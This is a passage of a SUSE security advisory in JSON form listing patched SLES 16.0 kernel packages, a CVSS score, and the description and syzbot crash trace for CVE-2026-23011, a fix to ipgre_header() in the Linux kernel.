"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-23006"
},
{
"cve": "CVE-2026-23011",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23011"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: ip_gre: make ipgre_header() robust\n\nAnalog to commit db5b4e39c4e6 (\"ip6_gre: make ip6gre_header() robust\")\n\nOver the years, syzbot found many ways to crash the kernel\nin ipgre_header() [1].\n\nThis involves team or bonding drivers ability to dynamically\nchange their dev-\u003eneeded_headroom and/or dev-\u003ehard_header_len\n\nIn this particular crash mld_newpack() allocated an skb\nwith a too small reserve/headroom, and by the time mld_sendpack()\nwas called, syzbot managed to attach an ipgre device.\n\n[1]\nskbuff: skb_under_panic: text:ffffffff89ea3cb7 len:2030915468 put:2030915372 head:ffff888058b43000 data:ffff887fdfa6e194 tail:0x120 end:0x6c0 dev:team0\n kernel BUG at net/core/skbuff.c:213 !\nOops: invalid opcode: 0000 [#1] SMP KASAN PTI\nCPU: 1 UID: 0 PID: 1322 Comm: kworker/1:9 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025\nWorkqueue: mld mld_ifc_work\n RIP: 0010:skb_panic+0x157/0x160 net/core/skbuff.c:213\nCall Trace:\n \u003cTASK\u003e\n skb_under_panic net/core/skbuff.c:223 [inline]\n skb_push+0xc3/0xe0 net/core/skbuff.c:2641\n ipgre_header+0x67/0x290 net/ipv4/ip_gre.c:897\n dev_hard_header include/linux/netdevice.h:3436 [inline]\n neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618\n NF_HOOK_COND include/linux/netfilter.h:307 [inline]\n ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247\n NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318\n mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693\n process_one_work kernel/workqueue.c:3257 [inline]\n process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
